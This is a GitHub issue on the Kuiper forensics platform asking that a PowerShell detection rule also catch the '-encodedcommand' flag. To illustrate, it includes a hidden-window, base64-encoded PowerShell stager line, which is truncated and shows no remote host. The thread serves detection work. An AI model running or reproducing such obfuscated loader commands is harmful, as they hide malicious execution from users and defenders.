DFIRKuiper / Kuiper

Digital Forensics Investigation Platform
772 stars 111 forks source link

"Powershell_Execution" rule does not catch "-encodedcommand" #112

Closed congtrung2k1 closed 1 year ago

congtrung2k1 commented 1 year ago

In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, it is only condition to catch text in Data like below: Event.EventData.Data.#text:

And there is another way to encode the command: -encodedcommand

Suggestion: Add string:

More strings should be added:

congtrung2k1 commented 1 year ago

Here is an example payload:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU

salehmuhaysin commented 1 year ago

the embedded Rhaegal is not enough to be honest, there is a lot of options not included, but it is a sample that help to create more custom rules